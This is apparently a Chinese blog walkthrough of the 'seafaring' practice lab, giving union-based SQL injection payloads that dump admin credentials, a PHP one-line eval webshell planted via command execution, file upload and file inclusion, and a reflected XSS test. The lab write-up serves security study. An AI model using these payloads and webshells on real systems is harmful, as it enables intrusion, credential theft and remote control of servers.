seafaring靶场漏洞测试攻略

embedded/2024/12/22 20:04:49/

打开网页

一.sql注入漏洞

1.输入框测试回显点

-1 union select 1,2,3#

2.查看数据库

-1 union select 1,2,database()#

3.查看表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#

4.查看admin表中列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#

5.查看admin的账号和密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

账号为admin,密码为mysql

二:命令执行漏洞

1.页面下方有一个执行框,输入ls查看

2.输入echo '<?php phpinfo();?>' > wff.php 访问wff.php

3.写入一句话木马,访问69.php

echo '<?php @eval($_POST['cmd']);?>' > 69.php

4.蚁剑连接

三:文件上传漏洞

1.使用 账号为admin,密码为mysql 登录网站后台,下方有一个上传文件的地方

2.上传php文件成功,尝试写入一句话木马到wff.php中上传

3.访问上传成功给的路径

4.蚁剑连接

四:文件包含漏洞

1.页面关于存在文件包含

2.通过访问之前写入的wff.php查看,远程文件包含关闭,本地文件可以访问

3.包含之前的69.php一句话木马,访问

4.蚁剑连接

五:反射型xss漏洞

1.登陆界面输入错误会回显在页面上

2.输入<script>alert(1)</script>,页面弹1


http://www.ppmy.cn/embedded/111421.html

相关文章

Codeforces practice C++ 2024/9/11 - 2024/9/13

D. Mathematical Problem Codeforces Round 954 (Div. 3) 原题链接&#xff1a;https://codeforces.com/contest/1986/problem/D 题目标签分类&#xff1a;brute force&#xff0c;dp&#xff0c;greedy&#xff0c;implementation&#xff0c;math&#xff0c;two pointers…

Redis的IO模型

Redis IO模型 Redis IO模型 使用的是基于 Reactor 模式的 I/O 多路复用模型。这个模型通过单线程事件循环来处理所有的客户端请求和响应。 基本模式 1. Reactor 模式 Reactor 模式是一种用于处理并发 I/O 操作的设计模式。它包含以下几个组件&#xff1a; 多路复用器&…

OpenSNN推文:神经网络(Neural Network)相关论文最新推荐(九月份)(二)

BP神经网络背景下应急通信网性能评价方法研究 论文链接&#xff1a;oalib简介&#xff1a;  在列举和阐述应急通信网性能评价指标的基础上&#xff0c;本文首先利用熵权系数法确定了各指标权重&#xff0c;进而通过模糊综合评判法确定了评判权值&#xff0c;最后通过构造人工…

Spring Boot项目中实现OAuth2客户端模式(Client Credentials Grant Type)

背景 在项目中难免需要和外部系统进行对接,既然对接那就需要进行鉴权认证,一般外围系统的对接交互方式协议分两种:https和内网;如果是https,有些场景也需要进一步进行接口层面的鉴权认证,虽然通道已经进行了保障了 OAuth2基础知识 在学习本篇OAuth2的客户端模式认证之…

表格多列情况下,loading不显示问题

问题描述&#xff1a; 用element plus 做得表格&#xff0c;如下图&#xff0c;列数较多&#xff0c;且部分表格内容显示比较复杂&#xff0c;数据量中等的情况下&#xff0c;有一个switch 按钮&#xff0c;切换部分列的显示和隐藏&#xff0c;会发现&#xff0c;切换为显示的时…

Visual Studio配置opencv环境

&#xff08;1&#xff09;打开属性页面&#xff08;鼠标放在解决方案上&#xff0c;点击右键会有一个属性选项弹出&#xff09; &#xff08;2&#xff09;配置opencv的include和opencv2路径&#xff0c;具体路径和版本根据自己电脑配置 &#xff08;3&#xff09;配置opencv…

Go开源日志库Logrus的使用

一、Logrus简介 Logrus 是一个流行的 Go 语言日志库&#xff0c;以其功能强大、性能高效和高度灵活性而闻名。有关更多介绍可查看 Logrus。 主要特点 丰富的日志级别&#xff1a;Logrus 支持多种日志级别&#xff0c;包括 Debug、Info、Warn、Error、Fatal 和 Panic&#xf…

图文讲解HarmonyOS应用发布流程

HarmonyOS应用的开发和发布过程可以分为以下几个步骤&#xff1a;证书生成、应用开发、应用签名和发布。 1. 证书生成&#xff1a; 在开始开发HarmonyOS应用之前&#xff0c;首先需要生成一个开发者证书。开发者证书用于标识应用的开发者身份并确保应用的安全性。可以通过Har…